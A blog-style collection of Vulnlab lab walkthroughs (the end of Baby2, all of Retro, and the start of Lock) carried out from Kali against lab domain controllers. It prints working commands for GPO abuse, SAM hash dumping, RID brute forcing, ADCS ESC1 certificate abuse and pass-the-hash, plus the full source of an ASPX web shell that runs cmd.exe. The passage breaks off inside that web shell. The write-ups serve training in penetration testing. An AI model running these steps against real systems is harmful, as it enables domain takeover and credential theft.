Using pyGPOAbuse, we can create an immediate scheduled task which will get executed as SYSTEM user to add gpoadm in local administrators group (for this I had to use python virtual environment as some dependencies were causing an issue with the current version of impacket), we’ll need the GPO ID for creating the task

.

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ git clone https://github.com/Hackndo/pyGPOAbuse.git Cloning into 'pyGPOAbuse'
┌──(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ python3 -m venv venv
┌──(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ source venv/bin/activate
┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ ls assets LICENSE pygpoabuse pygpoabuse.py README.md requirements.txt venv
┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse] 
└─$ pip3 install -r requirements.txt Collecting msldap (from -r requirements.txt (line 1))
┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ python3 pygpoabuse.py 'baby2.vl/gpoadm:Password123!' -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -f -dc-ip 10.10.71.85 -command 'net localgroup administrators /add gpoadm' 
SUCCESS:root:ScheduledTask TASK_60bdad92 created!
[+] ScheduledTask TASK_60bdad92 created!

now we are admin

PS C:\temp> net user gpoadm
net user gpoadm
User name gpoadm
Full Name gpoadm
Comment 
User's comment 
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/6/2024 7:16:03 AM
Password expires Never
Password changeable 6/7/2024 7:16:03 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script 
User profile 
Home directory 
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators 
Global Group memberships *Domain Users 
The command completed successfully.

PS C:\temp>


┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ evil-winrm -i baby2.vl -u 'gpoadm' -p 'Password123!' 

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\gpoadm\Documents> whoami
baby2\gpoadm
*Evil-WinRM* PS C:\Users\gpoadm\Documents>

.

Beyond root

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ xfreerdp /v:10.10.74.17 -sec-nla

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ impacket-secretsdump baby2.vl/gpoadm:'Password123!'@10.10.74.17

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x34170b414576a40142e3edc4911d859d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::

*Evil-WinRM* PS C:\Users\Administrator\Documents> net user administrator Password123!
The command completed successfully.

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ xfreerdp /v:10.10.74.17 -sec-nla 

 

.

 

c:\windows\system32\tasks\logonsim

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2023-08-22T12:48:15.1312495</Date>
    <Author>BABY2\Administrator</Author>
    <URI>\logonsim</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <Enabled>true</Enabled>
      <UserId>BABY2\Amelia.Griffiths</UserId>
      <Delay>PT2M</Delay>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>LeastPrivilege</RunLevel>
      <UserId>BABY2\Amelia.Griffiths</UserId>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
      <Arguments>\windows\logon.ps1</Arguments>
    </Exec>
  </Actions>
</Task>

c:\windows\login.ps1

cscript //X \\baby2.vl\SYSVOL\baby2.vl\scripts\login.vbs

.

 

 

 

 

 

 

 

.

 

 

vulnlab-retro

vulnlab-retro

Let’s start with an Nmap scan.

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ cat ports_retro.txt                                       
# Nmap 7.94SVN scan initiated Mon Jun  3 18:51:15 2024 as: nmap -Pn -sC -sV -oN ports_retro.txt 10.10.95.159
Nmap scan report for 10.10.95.159
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-03 16:51:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-03T16:52:44+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-03T16:52:04+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-06-02T16:49:49
|_Not valid after:  2024-12-02T16:49:49
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2024-06-03T16:52:06
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  3 18:52:46 2024 -- 1 IP address (1 host up) scanned in 91.24 seconds
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]

.

LDAP enum

➜  retro ldapsearch -x -H ldap://retro.vl -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts 
#

#
dn:
namingContexts: DC=retro,DC=vl
namingContexts: CN=Configuration,DC=retro,DC=vl
namingContexts: CN=Schema,CN=Configuration,DC=retro,DC=vl
namingContexts: DC=DomainDnsZones,DC=retro,DC=vl
namingContexts: DC=ForestDnsZones,DC=retro,DC=vl

try null auth

➜  retro ldapsearch -x -H ldap://retro.vl -s sub -b 'DC=retro,DC=vl'
# extended LDIF
#
# LDAPv3
# base <DC=retro,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090AC9, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

auth required

.

SMB

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --shares 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\guest: 
SMB         dc.retro.nl     445    DC               [+] Enumerated shares
SMB         dc.retro.nl     445    DC               Share           Permissions     Remark
SMB         dc.retro.nl     445    DC               -----           -----------     ------
SMB         dc.retro.nl     445    DC               ADMIN$                          Remote Admin
SMB         dc.retro.nl     445    DC               C$                              Default share
SMB         dc.retro.nl     445    DC               IPC$            READ            Remote IPC
SMB         dc.retro.nl     445    DC               NETLOGON                        Logon server share 
SMB         dc.retro.nl     445    DC               Notes                           
SMB         dc.retro.nl     445    DC               SYSVOL                          Logon server share 
SMB         dc.retro.nl     445    DC               Trainees        READ            
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
impacket-smbclient guest@retro -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Trainees
# ls
drw-rw-rw-          0  Mon Jul 24 00:16:11 2023 .
drw-rw-rw-          0  Wed Jul 26 11:54:14 2023 ..
-rw-rw-rw-        288  Mon Jul 24 00:16:11 2023 Important.txt
# cat important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

RID-Brute

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --shares 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\guest: 
SMB         dc.retro.nl     445    DC               [+] Enumerated shares
SMB         dc.retro.nl     445    DC               Share           Permissions     Remark
SMB         dc.retro.nl     445    DC               -----           -----------     ------
SMB         dc.retro.nl     445    DC               ADMIN$                          Remote Admin
SMB         dc.retro.nl     445    DC               C$                              Default share
SMB         dc.retro.nl     445    DC               IPC$            READ            Remote IPC
SMB         dc.retro.nl     445    DC               NETLOGON                        Logon server share 
SMB         dc.retro.nl     445    DC               Notes                           
SMB         dc.retro.nl     445    DC               SYSVOL                          Logon server share 
SMB         dc.retro.nl     445    DC               Trainees        READ            
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --rid-brute 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\guest: 
SMB         dc.retro.nl     445    DC               [+] Brute forcing RIDs
SMB         dc.retro.nl     445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         dc.retro.nl     445    DC               501: RETRO\Guest (SidTypeUser)
SMB         dc.retro.nl     445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         dc.retro.nl     445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         dc.retro.nl     445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.retro.nl     445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         dc.retro.nl     445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         dc.retro.nl     445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1109: RETRO\tblack (SidTypeUser)
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]

Simple check user=pass

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee'            
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]

SMB check again with creds

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --shares 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
SMB         dc.retro.nl     445    DC               [+] Enumerated shares
SMB         dc.retro.nl     445    DC               Share           Permissions     Remark
SMB         dc.retro.nl     445    DC               -----           -----------     ------
SMB         dc.retro.nl     445    DC               ADMIN$                          Remote Admin
SMB         dc.retro.nl     445    DC               C$                              Default share
SMB         dc.retro.nl     445    DC               IPC$            READ            Remote IPC
SMB         dc.retro.nl     445    DC               NETLOGON        READ            Logon server share 
SMB         dc.retro.nl     445    DC               Notes           READ            
SMB         dc.retro.nl     445    DC               SYSVOL          READ            Logon server share 
SMB         dc.retro.nl     445    DC               Trainees        READ            
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
impacket-smbclient trainee:trainee@retro.vl
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Notes
# ls
drw-rw-rw-          0  Mon Jul 24 00:03:16 2023 .
drw-rw-rw-          0  Wed Jul 26 11:54:14 2023 ..
-rw-rw-rw-        248  Mon Jul 24 00:05:56 2023 ToDo.txt
# cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

I found a great blog post by TrustedSec explaining how to abuse pre-created computer accounts.

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --rid-brute 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
SMB         dc.retro.nl     445    DC               [+] Brute forcing RIDs
SMB         dc.retro.nl     445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         dc.retro.nl     445    DC               501: RETRO\Guest (SidTypeUser)
SMB         dc.retro.nl     445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         dc.retro.nl     445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         dc.retro.nl     445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.retro.nl     445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         dc.retro.nl     445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         dc.retro.nl     445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1109: RETRO\tblack (SidTypeUser)
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ 

pre-created computer accounts with the Assign this computer account as a pre-Windows 2000 computer checkmark, would have the password for the computer account the same as the computer account name in lowercase.

crackmapexec smb retro.vl -u 'BANKING$' -p 'banking'    
SMB         retro.vl   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         retro.vl   445    DC               [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 
crackmapexec smb retro.vl -u 'BANKING$' -p 'bankings'
SMB         retro.vl   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         retro.vl   445    DC               [-] retro.vl\BANKING$:bankings STATUS_LOGON_FAILURE

To change the computer password we can use impacket-changepasswd script. The article also mentions using RPC over SMB as it results in errors. We can do so with the -p rpc-samr flag.

impacket-changepasswd 'retro.vl/BANKING$':banking@retro.vl -newpass Password12345 -dc-ip 10.10.106.112 -p rpc-samr
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

ADCS check

I always 1st sync the system clock with the DC

┌──(puck㉿kali)-[~]
└─$ sudo ntpdate retro.vl      
2024-06-03 19:23:00.526214 (+0200) -1.338499 +/- 0.011652 retro.vl 10.10.108.116 s1 no-leap
CLOCK: time stepped by -1.338499

 

┌──(puck㉿kali)-[~] 
└─$ certipy-ad find -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users

look for vuln template

➜  retro certipy-ad find -vulnerable -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

As we can see certipy-ad has flagged one template vulnerable to ESC1.

ESC1 allows us to request a certificate and supply the subject SPN. This is due to the EnrolleeSuppliesSubject flag set. We can use certipy-ad again and request a administrator certificate.

certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl               
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 16

Unfortunately, this has failed with the CERTSRV_E_KEY_LENGTH which means that the public key does not meet the minimum size required by the specified certificate template. Taking a look back at the certipy output we can see that the RetroClients certificate template requires minimum RSA key length of 4096 Bytes.

Fortunately, certipy-ad allows us to set the RSA key length with the -key-size flag.

certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 17
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

This works, we can now use auth module of certipy to get a valid TGT as administrator.

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.108.116                                                                      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': *******************************:*******************************

We now own a administrator certificate which we can use to authenticate to the domain controller.

┌──(puck㉿kali)-[~]
└─$ evil-winrm -i retro.vl -u 'Administrator' -H '<REDACTED>' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC

That’s all.

.

 

vulnlab-lock

vulnlab-lock

We have Gitea running on port 3000, There is an interesting script inside the dev-scripts repository of the ellen.freeman user
http://lock.vl:3000/ellen.freeman/dev-scripts/src/branch/main/repos.py which looks like it’s using a gitea access token. If we go to the commits we can see the Gitea access token is there in the initial commit:

➜  lock python3 repos.py <http://lock.vl:3000>
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website
curl -H 'Authorization: token <REDACTED>' http://10.10.113.72:3000/api/v1/user/repos | jq

 

 

there is a “website” repo

➜  lock git config --global http.extraHeader "Authorization: token <REDACTED>"
➜  lock git clone http://lock.vl:3000/ellen.freeman/website
Cloning into 'website'...
remote: Enumerating objects: 165, done.
remote: Counting objects: 100% (165/165), done.
remote: Compressing objects: 100% (128/128), done.
remote: Total 165 (delta 35), reused 153 (delta 31), pack-reused 0
Receiving objects: 100% (165/165), 7.16 MiB | 1.78 MiB/s, done.
Resolving deltas: 100% (35/35), done.

.

we upload a webshell

┌──(puck㉿kali)-[~/vulnlab/lock/website]
└─$ ls
assets  changelog.txt  cmdasp.aspx  index.html  readme.md
                                                                                                       
┌──(puck㉿kali)-[~/vulnlab/lock/website]
└─$ cat cmdasp.aspx
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
